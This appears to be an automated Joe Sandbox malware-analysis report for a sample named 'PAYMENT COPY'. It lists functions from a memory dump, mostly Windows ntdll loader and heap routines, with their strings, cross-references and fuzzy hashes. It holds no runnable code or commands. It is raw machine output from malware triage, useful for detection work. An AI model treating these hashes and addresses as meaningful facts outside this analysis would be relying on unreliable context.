FilterFullPath, xrefs: 0151C2E6

Memory Dump Source

Source File: 00000009.00000002.2685474878.0000000001490000.00000040.00001000.00020000.00000000.sdmp, Offset: 01490000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1490000_PAYMENT COPY.jbxd

Similarity

API ID:
String ID: FilterFullPath$UseFilter$\??\
API String ID: 0-2779062949
Opcode ID: 0d995d6e1f7600564ff0fab02d7da6b7342d9fb414947143bd916dfc95472fe0
Instruction ID: 9b57386449feed6f42d52e7619d8a46522729d3333a534cf837aeb275eeaeac5
Opcode Fuzzy Hash: 0d995d6e1f7600564ff0fab02d7da6b7342d9fb414947143bd916dfc95472fe0
Instruction Fuzzy Hash: 76A14B719416299BEF329F68CC88BEAB7B8FF44710F1001EAD909AB250D7759E85CF50

Function 014E0BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON

Download Yara Rule

Strings

LdrpCheckModule, xrefs: 0152A117
minkernel\ntdll\ldrinit.c, xrefs: 0152A121
Failed to allocated memory for shimmed module list, xrefs: 0152A10F

Memory Dump Source

Source File: 00000009.00000002.2685474878.0000000001490000.00000040.00001000.00020000.00000000.sdmp, Offset: 01490000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1490000_PAYMENT COPY.jbxd

Similarity

API ID:
String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
API String ID: 0-161242083
Opcode ID: e94b18ca8cf58ed4b737f49e1278c711aaaa4d535570a0008c76abd540120096
Instruction ID: 87f4d07cd64ed43e9766451b8642e5a1d69bf3a8e8d6df907fde1e7e6d32eba1
Opcode Fuzzy Hash: e94b18ca8cf58ed4b737f49e1278c711aaaa4d535570a0008c76abd540120096
Instruction Fuzzy Hash: C7710171A00206DFDB29DFA8C984ABEB7F4FF44704F15442EE522AB761E374A946CB50

Function 014D0A5B Relevance: 3.9, Strings: 3, Instructions: 190COMMON

Download Yara Rule

Strings

HEAP[%wZ]: , xrefs: 01525335
HEAP: , xrefs: 01525342
((PHEAP_ENTRY)LastKnownEntry <= Entry), xrefs: 0152534D

Memory Dump Source

Source File: 00000009.00000002.2685474878.0000000001490000.00000040.00001000.00020000.00000000.sdmp, Offset: 01490000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1490000_PAYMENT COPY.jbxd

Similarity

API ID:
String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
API String ID: 0-1334570610
Opcode ID: 7842b028a2f9164caa00f4cc12a22fcb223525bf120921882f3a9795a3ecc291
Instruction ID: f89093f9ea2d71600db6c919d55b894b4b281bbfcc5c318885e0748140e670ac
Opcode Fuzzy Hash: 7842b028a2f9164caa00f4cc12a22fcb223525bf120921882f3a9795a3ecc291
Instruction Fuzzy Hash: 6861BC716143029FDB29CF28C494BAABBE1FF55704F14855EE8998F3A2D770E881CB91

Function 014FC720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON

Download Yara Rule

Strings

Failed to reallocate the system dirs string !, xrefs: 015382D7
LdrpInitializePerUserWindowsDirectory, xrefs: 015382DE
minkernel\ntdll\ldrinit.c, xrefs: 015382E8

Memory Dump Source

Source File: 00000009.00000002.2685474878.0000000001490000.00000040.00001000.00020000.00000000.sdmp, Offset: 01490000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1490000_PAYMENT COPY.jbxd

Similarity

API ID:
String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
API String ID: 0-1783798831
Opcode ID: 98714acc16de2f0046b4b21c18b91d8b5bedda8fd8b5efbf1d9e46b952b36adf
Instruction ID: f0ce0c72a466d63ee5dd75efdfd2bdd1460a41f1e4819d1a1182dc70fa529df7
Opcode Fuzzy Hash: 98714acc16de2f0046b4b21c18b91d8b5bedda8fd8b5efbf1d9e46b952b36adf
Instruction Fuzzy Hash: 4C41CFB1540306ABCB21EB69D8C4F5B77E8BF94650F11492FFA549B3A0E770D8049B91

Function 0157C188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON

Download Yara Rule

Strings

@, xrefs: 0157C1F1
PreferredUILanguages, xrefs: 0157C212
\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0157C1C5

Memory Dump Source

Source File: 00000009.00000002.2685474878.0000000001490000.00000040.00001000.00020000.00000000.sdmp, Offset: 01490000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1490000_PAYMENT COPY.jbxd

Similarity

API ID:
String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
API String ID: 0-2968386058
Opcode ID: 50998f70e1f2e7b8b151bc70de26a84d0314582baf77c186ce0fadce66336727
Instruction ID: 4b2766b31d60d74fbdedb84ad69f7560ec3aac78a576ea322f9a546c400d5b7a
Opcode Fuzzy Hash: 50998f70e1f2e7b8b151bc70de26a84d0314582baf77c186ce0fadce66336727
Instruction Fuzzy Hash: 5D419371E0020AEBDF11DFD8D895FEEBBB8BB54700F14406AE649FB290E7749A448B50

Function 01554144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON

Download Yara Rule

Strings

LdrpResValidateFilePath Enter, xrefs: 01554160
LdrpResValidateFilePath Exit, xrefs: 01554172
@, xrefs: 01554225

Memory Dump Source

Source File: 00000009.00000002.2685474878.0000000001490000.00000040.00001000.00020000.00000000.sdmp, Offset: 01490000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1490000_PAYMENT COPY.jbxd

Similarity

API ID:
String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
API String ID: 0-1373925480
Opcode ID: 431a6c54cf0a036ebe3cc6348e0894c835d69dcbb0654f1eb4d15743add5d81b
Instruction ID: 53bf3852ad875932d7ab34699e7847c1b294dccfdc5d5b938f98e8a9731d3eb6
Opcode Fuzzy Hash: 431a6c54cf0a036ebe3cc6348e0894c835d69dcbb0654f1eb4d15743add5d81b
Instruction Fuzzy Hash: 84410372A006598BEB22DB9AC864BADBBF4FF65380F14045BDD01EF791E7348981CB11

Function 01544755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON

Download Yara Rule

Strings

minkernel\ntdll\ldrredirect.c, xrefs: 01544899
Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01544888
LdrpCheckRedirection, xrefs: 0154488F

Memory Dump Source

Source File: 00000009.00000002.2685474878.0000000001490000.00000040.00001000.00020000.00000000.sdmp, Offset: 01490000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1490000_PAYMENT COPY.jbxd

Similarity

API ID:
String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
API String ID: 0-3154609507
Opcode ID: 0bc124d196b71c04efd8ebce54c530b3d78df716d004ffd7b331a275ac73d263
Instruction ID: 1e50dd1c22f9faeb469b5a9dbecc97fcc2ae2824277abdc855a2fa47c3dbb88f
Opcode Fuzzy Hash: 0bc124d196b71c04efd8ebce54c530b3d78df716d004ffd7b331a275ac73d263
Instruction Fuzzy Hash: 7441D372A846519FEB21CE6CD840B2A7BE4FF89658F06055DED58EF312E730D801DB91

Function 014D0BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON

Download Yara Rule

Strings

(ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size), xrefs: 01525449
HEAP[%wZ]: , xrefs: 01525431
HEAP: , xrefs: 0152543E

Memory Dump Source

Source File: 00000009.00000002.2685474878.0000000001490000.00000040.00001000.00020000.00000000.sdmp, Offset: 01490000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1490000_PAYMENT COPY.jbxd

Similarity

API ID:
String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
API String ID: 0-2558761708
Opcode ID: 81a52b8cbd36013077932e52bcb899d95c9ddcb71714c77042ee9a9a38f0f7ce
Instruction ID: acc79c7ccece292ec6d9cc370ff95eee15ac3a60fed8d392441b10a8a5b3e27c
Opcode Fuzzy Hash: 81a52b8cbd36013077932e52bcb899d95c9ddcb71714c77042ee9a9a38f0f7ce
Instruction Fuzzy Hash: B711C0323281529FDB19DA19C8A4BBAF7A4FF41625F28815FF4068F2A1E730D845C7A0

Function 015420DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON

Download Yara Rule

Strings

minkernel\ntdll\ldrinit.c, xrefs: 01542104
LdrpInitializationFailure, xrefs: 015420FA
Process initialization failed with status 0x%08lx, xrefs: 015420F3

Memory Dump Source

Source File: 00000009.00000002.2685474878.0000000001490000.00000040.00001000.00020000.00000000.sdmp, Offset: 01490000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1490000_PAYMENT COPY.jbxd

Similarity

API ID:
String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
API String ID: 0-2986994758
Opcode ID: 206a480645e45fd09dcf8776e3617ddf04abfe43132c908118da962707eab2c0
Instruction ID: ab9bec81c553aa4997a5a646ac2ce0c205bc25aec4a7948f193ebf8e3d4449d5
Opcode Fuzzy Hash: 206a480645e45fd09dcf8776e3617ddf04abfe43132c908118da962707eab2c0
Instruction Fuzzy Hash: B8F04C346403197BE724D64DDC43FA93768FB84B48F61001DF7007F291D2F0A900D641

Function 014D03E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 01524D8A

Strings

#%u, xrefs: 01524D82

Memory Dump Source

Source File: 00000009.00000002.2685474878.0000000001490000.00000040.00001000.00020000.00000000.sdmp, Offset: 01490000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1490000_PAYMENT COPY.jbxd

Similarity

API ID: ___swprintf_l
String ID: #%u
API String ID: 48624451-232158463
Opcode ID: 9a550e478381dcb165ca991ee82ece7c9f8d3075099f2d4e568431e3ab8d4fd5
Instruction ID: 69e595e587acd7c032db0e293dcfb8ad15d1f70e7e7e3b1dcc25a8432aeb26b3
Opcode Fuzzy Hash: 9a550e478381dcb165ca991ee82ece7c9f8d3075099f2d4e568431e3ab8d4fd5
Instruction Fuzzy Hash: E6715E72A0014A9FDB01DFA9C990FAEB7F8BF58704F154066E905EB291E674ED01CB61

Function 014CA9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON

Download Yara Rule

Strings

LdrResSearchResource Exit, xrefs: 014CAA25
LdrResSearchResource Enter, xrefs: 014CAA13

Memory Dump Source

Source File: 00000009.00000002.2685474878.0000000001490000.00000040.00001000.00020000.00000000.sdmp, Offset: 01490000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1490000_PAYMENT COPY.jbxd

Similarity

API ID:
String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
API String ID: 0-4066393604
Opcode ID: 1e69b032694f7548f635d2e704ccbccd7ef3487aa5a0097af357b58f66fe921a
Instruction ID: 7be830992e62b3371d4e2938e5e86978e2370864c3db30054e7c500a315f3a2f
Opcode Fuzzy Hash: 1e69b032694f7548f635d2e704ccbccd7ef3487aa5a0097af357b58f66fe921a
Instruction Fuzzy Hash: 08E19775E002199FEF61CE9DC940BAEBBB5BF49710F20042BEA11EB2A1F7359941CB50

Function 0158A352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON

Download Yara Rule

Strings

`, xrefs: 0158A44B
`, xrefs: 0158A551

Memory Dump Source

Source File: 00000009.00000002.2685474878.0000000001490000.00000040.00001000.00020000.00000000.sdmp, Offset: 01490000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1490000_PAYMENT COPY.jbxd

Similarity

API ID:
String ID: `$`
API String ID: 0-197956300
Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
Instruction ID: 04109f9c2b1d6c5d2bcfcb2a8203581e83f854d4bd5c07c91b555dd4359a4f97
Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
Instruction Fuzzy Hash: D7C1CE312043429BEB25EE29C841B2BBBE5BFD4318F084A2EF696EF290D774D545CB51

Function 0153E6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON

Download Yara Rule

Strings

UEFI, xrefs: 0153E751
Legacy, xrefs: 0153E75A

Memory Dump Source

Source File: 00000009.00000002.2685474878.0000000001490000.00000040.00001000.00020000.00000000.sdmp, Offset: 01490000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1490000_PAYMENT COPY.jbxd

Similarity

API ID: InitializeThunk
String ID: Legacy$UEFI
API String ID: 2994545307-634100481
Opcode ID: 0fe5a4c5f6d73bccfdafd2e2b186cc147068fee4d683ad4b6045fc5fffd10a4b
Instruction ID: 31c4704b12e560b8b5656e9306a693a0f6c5e41de442dd0d28bff8b33fec11f2
Opcode Fuzzy Hash: 0fe5a4c5f6d73bccfdafd2e2b186cc147068fee4d683ad4b6045fc5fffd10a4b
Instruction Fuzzy Hash: 70614C71E002199FDB15DFA9C851BAEBBF5FB98700F14446EE649EF291D731A900CB50

Function 015643D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON

Download Yara Rule

Strings

MUI, xrefs: 01564525
@, xrefs: 01564437

Memory Dump Source

Source File: 00000009.00000002.2685474878.0000000001490000.00000040.00001000.00020000.00000000.sdmp, Offset: 01490000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1490000_PAYMENT COPY.jbxd

Similarity

API ID:
String ID: @$MUI
API String ID: 0-17815947
Opcode ID: 5d580e6370c16870b6b7d77e20c0a0f84cb3261a0849d97e9d87b7f2df09ab1c
Instruction ID: fe2aa6fbc762fe10f26f00972ffc75d3b715b5ca167407b4d4f398ec09ca859e
Opcode Fuzzy Hash: 5d580e6370c16870b6b7d77e20c0a0f84cb3261a0849d97e9d87b7f2df09ab1c
Instruction Fuzzy Hash: D4511871D0021EAEDF11DFA9CC84AEEBBBCFB54654F10052AE611AB290D6309945CBA0

Function 014C04E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON

Download Yara Rule

Strings

TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 014C063D
kLsE, xrefs: 014C0540

Memory Dump Source

Source File: 00000009.00000002.2685474878.0000000001490000.00000040.00001000.00020000.00000000.sdmp, Offset: 01490000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1490000_PAYMENT COPY.jbxd

Similarity

API ID:
String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
API String ID: 0-2547482624
Opcode ID: 4eb50673683ae2931a7b731a3b8427f09d57db7d554133a5456d9cb3a00f4e47
Instruction ID: 1c2ff31a9a8700b34a7fc1d5c48e981f5f130ba83bbc16b84f810f6fed7aae68
Opcode Fuzzy Hash: 4eb50673683ae2931a7b731a3b8427f09d57db7d554133a5456d9cb3a00f4e47
Instruction Fuzzy Hash: A351BC7D600742CBD764DF28C5406A3BBE4AF94B04F10483FE6AA87261E730D545CF92

Function 014CA2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON

Download Yara Rule

Strings

RtlpResUltimateFallbackInfo Exit, xrefs: 014CA309
RtlpResUltimateFallbackInfo Enter, xrefs: 014CA2FB

Memory Dump Source

Source File: 00000009.00000002.2685474878.0000000001490000.00000040.00001000.00020000.00000000.sdmp, Offset: 01490000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1490000_PAYMENT COPY.jbxd

Similarity

API ID:
String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
API String ID: 0-2876891731
Opcode ID: 80402eae3ed8ca7bef21fd3e98cd4afb8735ca245ac3244ecc3ac04fcc60d064
Instruction ID: 827e9e2042a492ce528925e8ee6e0e28d50086c64aaebad48f9430a593d83cdd
Opcode Fuzzy Hash: 80402eae3ed8ca7bef21fd3e98cd4afb8735ca245ac3244ecc3ac04fcc60d064
Instruction Fuzzy Hash: 7D41BD79A00659DBDB21CF69C450B6E7BB4FF85B00F24406AE900DF2B1E3B5D941CB40

Function 014FA5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON

Download Yara Rule

Strings

Cleanup Group, xrefs: 014FA5E4
Threadpool!, xrefs: 014FA5E9

Memory Dump Source

Source File: 00000009.00000002.2685474878.0000000001490000.00000040.00001000.00020000.00000000.sdmp, Offset: 01490000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1490000_PAYMENT COPY.jbxd

Similarity

API ID: InitializeThunk
String ID: Cleanup Group$Threadpool!
API String ID: 2994545307-4008356553
Opcode ID: 8a47e4fe44c8fa7b3de03e07e457563387e58edd3da748fea0d83262b19f779b
Instruction ID: a065aa4e970754d9eecfb31236745f9ec0acb1d00b9ca47e1dacee3d6646a1e4
Opcode Fuzzy Hash: 8a47e4fe44c8fa7b3de03e07e457563387e58edd3da748fea0d83262b19f779b
Instruction Fuzzy Hash: AF01F4B2254700AFE312DF24CD45F267BE8E794715F15893EA69CCB2A0E334D804CB46

Function 014CC7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON

Download Yara Rule

Strings

MUI, xrefs: 014CC8C3, 014CCA40

Memory Dump Source

Source File: 00000009.00000002.2685474878.0000000001490000.00000040.00001000.00020000.00000000.sdmp, Offset: 01490000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1490000_PAYMENT COPY.jbxd

Similarity

API ID:
String ID: MUI
API String ID: 0-1339004836
Opcode ID: b35cdd2aa18c337fb51cda3922f9b57a94794e07e342b24bb94332e26e9bb7e1
Instruction ID: 3ec463de0a14457a341c4da12b3539a09732f82e84fb6700220c9ca1ce249abd
Opcode Fuzzy Hash: b35cdd2aa18c337fb51cda3922f9b57a94794e07e342b24bb94332e26e9bb7e1
Instruction Fuzzy Hash: D0824E79E002199BDB65CFADC8807EEBBB1BF48B10F14816ED959AB361D7309942CF50

Function 01546420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON

Download Yara Rule

Strings

, xrefs: 015465C1

Memory Dump Source

Source File: 00000009.00000002.2685474878.0000000001490000.00000040.00001000.00020000.00000000.sdmp, Offset: 01490000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1490000_PAYMENT COPY.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 0681e219a56aa1bec198622d8353839a304b4007246a8f8d00373990c87f7078
Instruction ID: e58eae44f713ff176d9658c3e497c4562f2caa4df94169e607ec6b639726612b
Opcode Fuzzy Hash: 0681e219a56aa1bec198622d8353839a304b4007246a8f8d00373990c87f7078
Instruction Fuzzy Hash: 5F91617294021AAFEB21DF95CC95FEE7BB8FF55B54F104059F600AF1A0D675A900CBA0

Function 0156E10E Relevance: 1.5, Strings: 1, Instructions: 255COMMON

Download Yara Rule

Strings

, xrefs: 0156E1FA

Memory Dump Source

Source File: 00000009.00000002.2685474878.0000000001490000.00000040.00001000.00020000.00000000.sdmp, Offset: 01490000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1490000_PAYMENT COPY.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: fd1f5f3861a70262ab3bfc95e03c0c3880d457ac705d99c3bb94ffc7cdb7cf57
Instruction ID: 4a7de05041b2489e0afb1442aa9a2dadf4fea0e665b3e436053c9fd431cbb553
Opcode Fuzzy Hash: fd1f5f3861a70262ab3bfc95e03c0c3880d457ac705d99c3bb94ffc7cdb7cf57
Instruction Fuzzy Hash: F9919175A0150AAADF22EFA5DC55FAFBBBDFF95740F100019F600AB260DB74A905CB90

Function 014FA660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON

Download Yara Rule

Strings

GlobalTags, xrefs: 015367C9

Memory Dump Source

Source File: 00000009.00000002.2685474878.0000000001490000.00000040.00001000.00020000.00000000.sdmp, Offset: 01490000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1490000_PAYMENT COPY.jbxd

Similarity

API ID:
String ID: GlobalTags
API String ID: 0-1106856819
Opcode ID: 1e5cd708a47c1d3e1bcbe6037da92813d8500855e98a8f70495cd78c7973f695
Instruction ID: 49fbda530c4f245fd967e8349e73d5f02e1a2d49a08d9f85ac6c08c4aa0181ae
Opcode Fuzzy Hash: 1e5cd708a47c1d3e1bcbe6037da92813d8500855e98a8f70495cd78c7973f695
Instruction Fuzzy Hash: 37716F75E0020AAFDF29CF9DC5906ADBBF1BF98710F24812EE505AB351E7719A41CB50

Function 01564978 Relevance: 1.4, Strings: 1, Instructions: 153COMMON

Download Yara Rule

Strings

.mui, xrefs: 01564A7F

Memory Dump Source

Source File: 00000009.00000002.2685474878.0000000001490000.00000040.00001000.00020000.00000000.sdmp, Offset: 01490000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1490000_PAYMENT COPY.jbxd

Similarity

API ID:
String ID: .mui
API String ID: 0-1199573805
Opcode ID: 429422e85df4b267b8a8bf5c4cfb613a9abc73c2757fc099a231af034a9e11a8
Instruction ID: cbde6e20db6ae2fe6e1030bb2cfb11d150314a54cf571dc0580bda648ed75f9b
Opcode Fuzzy Hash: 429422e85df4b267b8a8bf5c4cfb613a9abc73c2757fc099a231af034a9e11a8
Instruction Fuzzy Hash: 9E51A372D0022AABDF15DF99D840AAEBBB9FF14A14F05412EEA11BF250D7749C01CBE4

Function 014DE627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON

Download Yara Rule

Strings

EXT-, xrefs: 014DE6A4

Memory Dump Source

Source File: 00000009.00000002.2685474878.0000000001490000.00000040.00001000.00020000.00000000.sdmp, Offset: 01490000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1490000_PAYMENT COPY.jbxd

Similarity

API ID:
String ID: EXT-
API String ID: 0-1948896318
Opcode ID: e24c0c811cfaa16c2b72b4cad29e137858024baf1dc9563366988f5fce6c01f7
Instruction ID: 3f4c072c94aa5f87ed50df36e796c6def5307ca6d99bb1a5555bddf3aa547654
Opcode Fuzzy Hash: e24c0c811cfaa16c2b72b4cad29e137858024baf1dc9563366988f5fce6c01f7
Instruction Fuzzy Hash: 7F41D5725083129BDB11DB75C890B6BB7E8AF98B14F45092FF684EB2A0E774D904C793

Function 0153C730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON

Download Yara Rule

Strings

BinaryHash, xrefs: 0153C77F

Memory Dump Source

Source File: 00000009.00000002.2685474878.0000000001490000.00000040.00001000.00020000.00000000.sdmp, Offset: 01490000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1490000_PAYMENT COPY.jbxd

Similarity

API ID:
String ID: BinaryHash
API String ID: 0-2202222882
Opcode ID: 90373a9540d89383db4e4b410bf77606620a73a2a32323df0b9067dc8c548108
Instruction ID: 36656de4291f2a2bda45cca7e7a0e668b15a8f1419220ccef0c918893b0df1b2
Opcode Fuzzy Hash: 90373a9540d89383db4e4b410bf77606620a73a2a32323df0b9067dc8c548108
Instruction Fuzzy Hash: 8F4124B1D0052EAADB21DA90CC94FDEB77CBB94714F0045A6AB08BF141DB709E498FA4

Function 01556B40 Relevance: 1.4, Strings: 1, Instructions: 106COMMON

Download Yara Rule

Strings

#, xrefs: 01556B91

Memory Dump Source

Source File: 00000009.00000002.2685474878.0000000001490000.00000040.00001000.00020000.00000000.sdmp, Offset: 01490000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1490000_PAYMENT COPY.jbxd

Similarity

API ID:
String ID: #
API String ID: 0-1885708031
Opcode ID: 64ad1f94888e1e4e27a2c2bb5bbb98828c48b2bed9dd1d5886dc872d6270e667
Instruction ID: 43e8caaa5e07f4ee1a8a2cdaa89916024d43db3f38e834d68421d279a647fc6b
Opcode Fuzzy Hash: 64ad1f94888e1e4e27a2c2bb5bbb98828c48b2bed9dd1d5886dc872d6270e667
Instruction Fuzzy Hash: 09312A31A007899BEB22DF69C864BAE7BB8FF54704F94402AED40AF282D775D805CB50

Function 0153CA72 Relevance: 1.3, Strings: 1, Instructions: 94COMMON

Download Yara Rule

Strings

BinaryName, xrefs: 0153CAA2

Memory Dump Source

Source File: 00000009.00000002.2685474878.0000000001490000.00000040.00001000.00020000.00000000.sdmp, Offset: 01490000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1490000_PAYMENT COPY.jbxd

Similarity

API ID:
String ID: BinaryName
API String ID: 0-215506332
Opcode ID: 8c43fee61ca0bb5a1578b278d533dcf0b717811783093f3c42a08f3c5b23d92a
Instruction ID: b62380599db22a1c060c65ed624a51183e3c41be57c6164bcad0d8a78d4c7b92
Opcode Fuzzy Hash: 8c43fee61ca0bb5a1578b278d533dcf0b717811783093f3c42a08f3c5b23d92a
Instruction Fuzzy Hash: C8310336900516AFEB1ADB59C865E6FBBB4FBC0720F01416AA901BB290D7309E00DBE0

Function 0154892A Relevance: 1.3, Strings: 1, Instructions: 47COMMON

Download Yara Rule

Strings

AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 0154895E

Memory Dump Source

Source File: 00000009.00000002.2685474878.0000000001490000.00000040.00001000.00020000.00000000.sdmp, Offset: 01490000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1490000_PAYMENT COPY.jbxd

Similarity

API ID:
String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
API String ID: 0-702105204
Opcode ID: 9d0fabd3aff81f57cdd1052e315683941e819ce1ffa57d29b4f15db3b1713d7b
Instruction ID: ec8a1c2b0d62cbb3617e604fd4455cc2dc74f3132b4a7d1ebba7aa29708d10ec
Opcode Fuzzy Hash: 9d0fabd3aff81f57cdd1052e315683941e819ce1ffa57d29b4f15db3b1713d7b
Instruction Fuzzy Hash: CD012B39211A029FE62A6F96CCC4A9EBFA5FF9565CB08041DF7411F161CB306845C7A2

Function 01562000 Relevance: .8, Instructions: 757COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2685474878.0000000001490000.00000040.00001000.00020000.00000000.sdmp, Offset: 01490000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1490000_PAYMENT COPY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 06e71a43ac3ab7ef3af07727851107cd114f8ff53e79581bd55955afa0db7dd9
Instruction ID: 445751c433406d7ac53017fde68e9133ea28cd8789c2111e53ec8d8bc4feb2cb
Opcode Fuzzy Hash: 06e71a43ac3ab7ef3af07727851107cd114f8ff53e79581bd55955afa0db7dd9
Instruction Fuzzy Hash: A442D3726083418FD725CF69C890A6FBBE9BF98340F08492DFA869F250D775D845CB92

Function 01558158 Relevance: .6, Instructions: 617COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2685474878.0000000001490000.00000040.00001000.00020000.00000000.sdmp, Offset: 01490000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1490000_PAYMENT COPY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d7f2a361d5d3fd748e552072daae5245a82c41c296f4e68ffac9bd23f7206796
Instruction ID: d93ec792294afb099db55e1ff90ccd937e39018cc7d6ab9ed757791ac4282898
Opcode Fuzzy Hash: d7f2a361d5d3fd748e552072daae5245a82c41c296f4e68ffac9bd23f7206796
Instruction Fuzzy Hash: 48426F71E00219CFEB65CF6AC891BADBBF5BF48300F15809AE949EB252D7349985CF50

Function 014D2840 Relevance: .6, Instructions: 605COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2685474878.0000000001490000.00000040.00001000.00020000.00000000.sdmp, Offset: 01490000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1490000_PAYMENT COPY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9097499f862afec8269a4d87b3b04606af1f6f82c6b4422769e648343d8d76d7
Instruction ID: 70ad2c1f450adc8ea942c688760d1587125138f93eeb76afe205c2d8d3867d46
Opcode Fuzzy Hash: 9097499f862afec8269a4d87b3b04606af1f6f82c6b4422769e648343d8d76d7
Instruction Fuzzy Hash: 6432E271A007668FDB25CF69C894BBEBBF2BF86304F14451DD8869F285D775A802CB90

Function 0156A118 Relevance: .6, Instructions: 591COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2685474878.0000000001490000.00000040.00001000.00020000.00000000.sdmp, Offset: 01490000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1490000_PAYMENT COPY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2fb34339259e6f78e6073f8b045c4bd28350de7a435b8792dfae11aed8b873db
Instruction ID: e0412d76e33ab1ac54f6d0499aec5a1676a47ba539251fcae881b4215adafa34
Opcode Fuzzy Hash: 2fb34339259e6f78e6073f8b045c4bd28350de7a435b8792dfae11aed8b873db
Instruction Fuzzy Hash: 2B22E4706046518BEB25CF2DC49037ABBF9BF45301F088859D997AF286E735E852DBE0

Function 014C6A50 Relevance: .5, Instructions: 548COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2685474878.0000000001490000.00000040.00001000.00020000.00000000.sdmp, Offset: 01490000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1490000_PAYMENT COPY.jbxd

Similarity

API ID:
String ID:
API String ID:
